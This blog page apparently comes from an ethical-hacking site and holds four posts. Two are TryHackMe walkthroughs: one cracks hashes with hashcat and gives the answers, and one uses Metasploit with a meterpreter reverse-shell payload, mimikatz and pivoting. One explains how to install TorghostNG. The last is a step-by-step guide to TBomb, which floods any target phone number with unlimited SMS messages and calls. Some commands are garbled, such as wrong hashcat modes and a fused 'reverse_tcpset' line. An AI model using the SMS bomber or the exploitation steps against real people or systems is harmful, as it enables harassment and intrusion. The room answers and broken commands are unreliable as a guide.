-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label Hacking Tutorial. Show all posts
Showing posts with label Hacking Tutorial. Show all posts
  • TryHackMe RP : Crack The Hash



    TryHackMe RP : Crack The Hash




    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    tryhackme RP Crack The Hash 


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    TryHackMe has recently had their 500th user sign up to access varied content from fundamentals of web security to basic reverse engineering. Their self contained virtual classrooms make it easy for users to focus on a particular area by aggregating the necessary information. They want users to focus on the learning instead of spending time scouring the internet for resources! They are a relatively new company, so they are still in the process of creating custom VMs for learning purposes, but more content is being released weekly and their newsletter gives users an insight to whats being released on a weekly basis ahead of time. TryHackeMe RP : Crack The Hash



     In the tryhackme crack the hash challange they make identifying the hashes easy with there Hint buttons used on the platform.These either tell you what the hash is exactly or point you in the right direction on what to look for.
    Try Hack Me hint

    In real life there is no hint system to get this information, now you might be an absolute ninja and can look at a hash and go that SHA256 but for the rest of us there s a few tools to our disposal.





    Hash Analyzer Tunnelsup.com Hash Analyser allows you to stick a hash into there site and will give you there best guess at what the hash is. This was all i used for the Crack the hash challenge and was pretty much spot on until some of the later tasks.


    Hash-Identifier can be found pre-installed in Kali Linux and will tell you the possible hashing algorithm for the hash you enter. The Nice thing about this other then it already being installed in kali is that it gives you a few alternatives which can help finding finding the right mode in hashcat.

    HashID This is a python based hash identifying tool which needs to be downloaded from there GitHub Repo. The cool thing about this tool is not only does it identify the hashes but also can give you the corresponding hashcat mode as part of the output.




    Find the HastCat Mode



    TryHackMe RP : Crack The Hash




    hashcat -h | grep sha256
    hashcat -h | grep md5
    hashcat -h | grep salt
    hashcat -h | grep sha

    hascat --help






    This can also be done in windows by replacing grep with the findstr command.




    TryHackMe RP : Crack The Hash




    Lets Get Cracking!


    For each of these Tasks in this challange I echo the hash into a text file called tryhackme.txt remembering not to stick a space after the hash and before the > as shown below as the extra space causes an issue cracking the password.

    echo 48bb6e862e54f2a795ffc4e541caed4d> hashes1.txt


    echo CBFDAC6008F9CAB4083784CBD1874F76618D2A97> hashes2.txt

    echo 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B3
    36B63032> hashes3.txt

    echo 48bb6e862e54f2a795ffc4e541caed4d> hashes4.txt
    ETC



    Task 1.1



    Hash: 48bb6e862e54f2a795ffc4e541caed4d
    Identified: MD5
    Hashcat mode: 0

    Command: hashcat -m 0 -a 0  hashes1.txt /usr/share/wordlists/rockyou.txt


      Password: easy  



    Task 1.2



    Hash: CBFDAC6008F9CAB4083784CBD1874F76618D2A97
    Identified: SHA1
    Hashcat Mode: 100


    Command: hashcat -m 100 hashes1.txt /usr/share/wordlists/rockyou.txt
    or
    command: hashcat -m 100 hashes1.txt /usr/share/wordlists/rockyou.txt  --force


       Password: password123 





     

     

    Task 1.3



    Hash:
    1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B
    336B63032

    Identified: SHA2-256
    Hashcat Mode: 1400


    Command: hashcat -m 1400 hashes1.txt /usr/share/wordlists/rockyou.txt 
    or
    command: hashcat -m 1400 hashes1.txt /usr/share/wordlists/rockyou.txt  --force


       Password: letmein  




    Task 1.4



    Hash:
    $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom
    Identified: Bcrypt
    Hashcat Mode: 3200


    command: hashcat -m 3200 hashes1.txt /usr/share/wordlists/rockyou.txt  --force


    Note: This Bcrypt Hash took me over a hour to crack which is by design because its based on the blowfish cipher, so you might want to go make some coffee or alternatively just try sticking this hash into Google.


       Password: bleh   



    Task 1.5



    Hash: 279412f945939ba78ce0758d3fd83daa

    Identified: MD4
    Hashcat Mode: 900
    Rule: Best64.rule


    Command: hashcat -m 3200 -r /rules/Best64.rule hashesh5.txt /usr/share/wordlists/rockyou.txt


    Note: Due this Password having a Capital letter at the start and some numbers on the end, this password cant be found with just the default rockyou.txt file. You have to add some rules to the Hashcat command to crack the hash. Check out the rules folder In your default Hashcat directory.


      Password: Eternity22 




    ----------------




    Task 2.1



    Hash: F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85
    Identified: SHA2-256
    Hashcat Mode: 1400

    Command: hashcat -m 1400 hashes6.txt /usr/share/wordlists/rockyou.txt


       Password: paule   





    Task2.2



    Hash: 1DFECA0C002AE40B8619ECF94819CC1B
    Identified: NTLM
    Hashcat Mode: 1000

    Command: hashcat -m 1000 hashes6.txt /usr/share/wordlists/rockyou.txt


      Password: n63umy8lkf4i 



    Task 2.3



    Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.
    Salt: aReallyHardSalt
    Identified:SHA512crypt
    Hashcat Mode: 1800

    Note: This one actually took me a while to work out what this hash was as there was no hint on tryhackme.com and neither the hash analyser website or Hash-identifier program recognised it. After some investigating it turns out that the hash comes from a Linux shadow file.


    Command: hashcat -m 1800  hashes8.txt /usr/share/wordlists/rockyou.txt
    or
    Command: hashcat -m 1800  hashes8.txt /usr/share/wordlists/rockyou.txt --force




      Password: waka99  




     

    Task 2.4



    Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6
    Salt: tryhackme
    Identified: HMAC-SHA1
    Hashcat Mode: 160


    Command: hashcat -m 160 hashes9.txt /usr/share/wordlists/rockyou.txt


    Note: This took me a while to figure out that the trick here is that you need to add the salt to the password file, separated by a colon (as below) to get the hash to crack.


    echo e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme> hashes9.txt



      Password: 481616481616 



    Conclusion




    I was actually quite surprised how quickly even my modest 1050 Ti graphics card can power through most of these hashes in a few minutes the only one that took any substantial amount of time was Task 1.4 the bcrypt hash.


    Some of the take away’s from this challenge is that even strong hashing techniques can be circumvented with weak passwords, The length of the password is more important than its complexity and some hashing techniques are better than others at resisting cracking attempts.


    I would also like to quickly thank TryHackMe.com for there fantastic platform which hopefully i will cover more of there rooms in the future.



     ----------------





    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    Video Tutorial :- 


        


    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


  • TryHackeMe RP : Metasploit walkthrough



    TryHackeMe RP  Metasploit walkthrough




    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    tryhackme rp Metasploit


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    TryHackMe has recently had their 500th user sign up to access varied content from fundamentals of web security to basic reverse engineering. Their self contained virtual classrooms make it easy for users to focus on a particular area by aggregating the necessary information. They want users to focus on the learning instead of spending time scouring the internet for resources! They are a relatively new company, so they are still in the process of creating custom VMs for learning purposes, but more content is being released weekly and their newsletter gives users an insight to whats being released on a weekly basis ahead of time. TryHackeMe RP : Metasploit walkthrough





     tryhackme rp nmap





    Question:


    [Task 1] Intro

    [Task 2] Initializing…


    1) First things first, we need to initialize the database! Let’s do that now with the command: msfdb init





       msfdb init    


    I already initialzed database


    TryHackeMe RP : Metasploit walkthrough



    2) Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h


      msfconsole -h  


    TryHackeMe RP : Metasploit walkthrough




    3) We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-’


        ANS: -q    



    4) Once the database is initialized, go ahead and start Metasploit via the command: msfconsole


      msfconsole 




    TryHackeMe RP : Metasploit walkthrough




    5)  After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status


      db_status 



    TryHackeMe RP : Metasploit walkthrough





    6) Cool! We’ve connected to the database, which type of database does Metasploit 5 use?


      ANS: postgresql 



     ---------------------



     [Task 3] Rock ’em to the Core [Commands]



    Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help


      help  



    2) The help menu has a very short one-character alias, what is it?



       ?   



    3)  Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?



       search  



    4) Once we’ve found the module we want to leverage, what command we use to select it as the active module?



       use  



    5) How about if we want to view information about either a specific module or just the active one we have selected?



       info  




    6) Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?


      connect 



    7) Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?



      banner  



    TryHackeMe RP : Metasploit walkthrough



    8)  We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?


      set  



    9) Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?


      setg   



    10)  Now that we’ve learned about to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.


      get  



    TryHackeMe RP : Metasploit walkthrough





    11) How about changing the value of a variable to null/no value?



      unset 



    12) When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?



       spool 



    13) Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.


       
      save  


      ----------------

     

    [Task 4] Modules for Every Occasion!



    1) Easily the most common module utilized, which module holds all of the exploit code we will use?


      exploit 



    2) Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?


       payload  



    3)  Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.


       auxiliary  




    4)  One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?


       post   



    5)  Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?


       encoder 



    6) Last but not least, which module is used with buffer overflow and ROP attacks?


      NOP  



    7)  Not every module is loaded in by default, what command can we use to load different modules?


       load  



    -------------

    [Task 5] Move that shell!



    1) Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command ‘db_nmap -sV BOX-IP’


       db_nmap -sV <ip>  





    TryHackeMe RP : Metasploit walkthrough






    2. What service does nmap identify running on port 135?


      ANS: msrdp 




    3. Let’s go ahead and see what information we have collected in the database. Try typing the command ‘hosts’ into the msfconsole now.


      hosts  



    TryHackeMe RP : Metasploit walkthrough



    4)  How about something else from the database, try the command ‘services’ now.




      services 



    TryHackeMe RP : Metasploit walkthrough





    5) One last thing, try the command ‘vulns’ now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.


      vulns 



    6)  Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type ‘use’ followed by a unique string found within only the target exploit. For example, try this out now with the following command ‘use icecast’. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start



      use icecast  




    TryHackeMe RP : Metasploit walkthrough



       ANS: exploit/windows/http/icecast_header 
     



    7) While that use command with the unique string can be incredibly useful that’s not quite the exploit we want here. Let’s now run the command ‘search multi/handler’. What is the name of the column on the far left side of the console that shows up next to ‘Name’? Go ahead and run the command ‘use NUMBER_NEXT_TO exploit/multi/handler` wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.




      search multi/handler  



    TryHackeMe RP : Metasploit walkthrough



      ANS: # 



    8)  Now type the command ‘use NUMBER_FROM_PREVIOUS_QUESTION’. This is the short way to use modules returned by search results.



      use 4  



    9) Next, let’s set the payload using this command ‘set PAYLOAD windows/meterpreter/reverse_tcp’. In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command ‘set LHOST YOUR_IP_ON_TRYHACKME’. You might have to check your IP using the command ‘ip addr’, it will likely be your tun0 interface.


      set PAYLOAD windows/meterpreter/reverse_tcpset 


       LHOST tun0    



    10) Let’s go ahead and return to our previous exploit, run the command `use icecast` to select it again.


      use icecast  



    11)  One last step before we can run our exploit. Run the command ‘set RHOST BOX_IP’ to tell Metasploit which target to attack.



      set RHOST <box_ip> 



    12) Once you’re set those variables correctly, run the exploit now via either the command ‘exploit’ or the command ‘run -j’ to run this as a job.


       run -j  




    13)  Once we’ve started this, we can check all of the jobs running on the system by running the command `jobs`

      jobs  


    14) After we’ve established our connection in the next task, we can list all of our sessions using the command `sessions`. Similarly, we can interact with a target session using the command `sessions -i SESSION_NUMBER`


       sessions   

       session 1  



    -------------


    [Task 6] We’re in, now what?



    1) First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command ‘ps’. What’s the name of the spool service?

       ps  






    TryHackeMe RP : Metasploit walkthrough





        ANS: spoolsv.exe   




    2) Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!



       migrate -N spoolsv.exe  




    3) Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?


      getuid  



    4)  How about finding more information out about the system itself?



      sysinfo 




    5. This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?



         load kiwi     



    6)  Let’s go ahead and figure out the privileges of our current user, what command do we run?



       getprivs  



    7)  What command do we run to transfer files to our victim computer?


       upload  



    8)  How about if we want to run a Metasploit module?


       run   



    9) A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?


       ipconfig  




    10) Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command `run post/windows/gather/checkvm`. This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.




       run post/windows/gather/checkvm 




    11) Next, let’s try: `run post/multi/recon/local_exploit_suggester`. This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room `Ice`.



       run post/multi/recon/local_exploit_suggester  



    12) Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: `run post/windows/manage/enable_rdp`



      run post/windows/manage/enable_rdp  


    13. One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?


        shell  




    ---------------


    [Task 7] Makin’ Cisco Proud




    1) Let’s go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.



      run autoroute -h  



       run autoroute -s 172.18.1.0 -n 255.255.255.0  




    2) Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command `search server/socks4a`. What is the full path to the socks4a auxiliary module?



       search server/socks4a  



      ANS: auxiliary/server/socks4a  
     


    3)  Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains?



      proxychains  


    TryHackeMe RP : Metasploit walkthrough





     ----------------





    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :-  



         




    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • TorghostNG - How to anonymize your internet traffic






    So today we will know about the open source tool that helps in keep anonymous, TorghostNG - Make all your internet traffic anonymized with Tor network. This tool is scripted in python language as you can tell -_- you can help us by subscribing to our youtube channel :. Kumar Atul Jaiswal .: before using the too.


    About TorghostNG


    TorghostNG is a tool that make all your internet traffic anonymized through Tor network.

    Rewritten from TorGhost with Python 3.

    TorghostNG was tested on:


    •     Kali Linux
    •     Manjaro
    •     ...
      
      
    Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks.
    TorghostNG - Make all your internet traffic anonymized with Tor network.

    Before you use TorghostNG


    • For the goodness of Tor network, BitTorrent traffic will be blocked by iptables. Although you can bypass it with some tweaks with your torrent client disappointed_relieved. It's difficult to completely block all torrent traffic.
    • For security reason, TorghostNG is gonna disable IPv6 to prevent IPv6 leaks (it happened to me lmao or whatismyip.live). tor network TorghostNG  - How to anonymize your internet traffic


    Installing TorghostNG


    TorghostNG currently supports:
    •     GNU/Linux distros that based on Arch Linux
    •     GNU/Linux distros that based on Debian/Ubuntu
    •     GNU/Linux distros that based on Fedora, CentOS, RHEL, openSUSE
    •     Solus OS
    •     Void Linux
    •     Anh the elder guy: Slackware
    •     (Too much package managers for one day :v) torghostng

    How To Install ?

    1) git clone https://github.com/githacktools/TorghostNG




    2) ls

    cd TorghostNG

    ls






    3) sudo python3 install.py






    4) sudo python3 torghostng.py







    5) sudo python3 torghostng.py -s -c -id it











    https://www.hackingtruth.in/2020/06/xss-vulnerability-find-in-any-website.html





    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :- 

     

  • send a unlimited SMS via sms bombing and call bomber in any number



    SMS Bombing & Call bomber in any number


    So today we will know about the special technique of unlimited sending sms, which is named SMS bombing so, we will covered in this article about SMS Bombing and How to use ?  so, you can use this tool in kali linux, windows and MacOS also. so, lets get started!


    SMS Bombing & Call bomber


    Due misusing of TBomb, several API's died. Don't be afraid if you don't see all send messages. call bomber


    • The script requires working network connection to work.
    • No balance will be deducted for using this script to send SMS/calls.
    • While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance.
    • Don't put spaces in between phone number (Ex- 99999 99999)
    • Make sure you are using the latest version of TBomb
    • Make sure you are using Python3. SMS Bombing & Call bomber in any number  custom sms bomber



    Here's how you can check it. Type this command in your terminal.


    python -V



    Features:


    • Lots of integrated SMS/call APIs
    • Unlimited (Limited against abusing) and super-fast bombing
    • International bombing available (APIS Dead. Try Your Luck.)
    • Call bombing
    • Frequent updates
    • Automatic updating mechanism
    • Easy to use and embed in code




    How To Use ? ( LInux )


    step 1 :- First we need to install sms bombing tool so,

    git clone https://github.com/TheSpeedX/TBomb





    ls

    cd







    Run


    bash TBomb.sh










    Press 1 To  Start SMS Bomber
    Press 2 To  Start Call Bomber
    Press 3 To  Update (Works On Linux And Linux Emulators)
    Press 4 To  View Features
    Press 5 To  Exit



    I will choose option 1 so, press 1 and hit enter







    Enter Your Country Code ( without + ) : 91
    Enter Target Number : +91 7979*********
    Enter Number of Messages To Send ( 0 For Unlimited ) : 0
    Enter Delay Time ( in Seconds ) [Recommended 2 sec ] : 2
    Number Of Threads(10 to 20) : 19

    and then hit enter











    call bomber
    custom sms bomber
    sms bomber script
    sms bomber protection
    sms bomber
    android missing tricks
    sms bomber telegram
    sms bomber
    turbo bomber
    sms app
    Kali linux

    For Termux:


    Notice:

    git installation methods are not universal and do differ between distributions, so, installing git as per instructions below may not work. Please check out how to install git for your Linux distribution. Commands below provide instructions for Debian-based systems.

    To use the bomber type the following commands in Termux:

    pkg install git
    pkg install python
    git clone https://github.com/TheSpeedX/TBomb.git
    cd TBomb
    chmod +x TBomb.sh
    ./TBomb.sh




    For macOS:


    To use the bomber type the following commands in macOS terminal:

    # Install Brew:

    /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

    # Install dependencys:

    brew install git
    brew install python3
    sudo easy_install pip
    sudo pip install --upgrade pip
    git clone https://github.com/TheSpeedX/TBomb.git
    cd TBomb
    chmod +x TBomb.sh

    # Missing Tools on MacOS

    Toilet cannot be installed yet. But TBomb does still work.

    # Run TBomb:

    sudo bash TBomb.sh







    Disclaimer

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


    Video Tutorial :- SOON



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.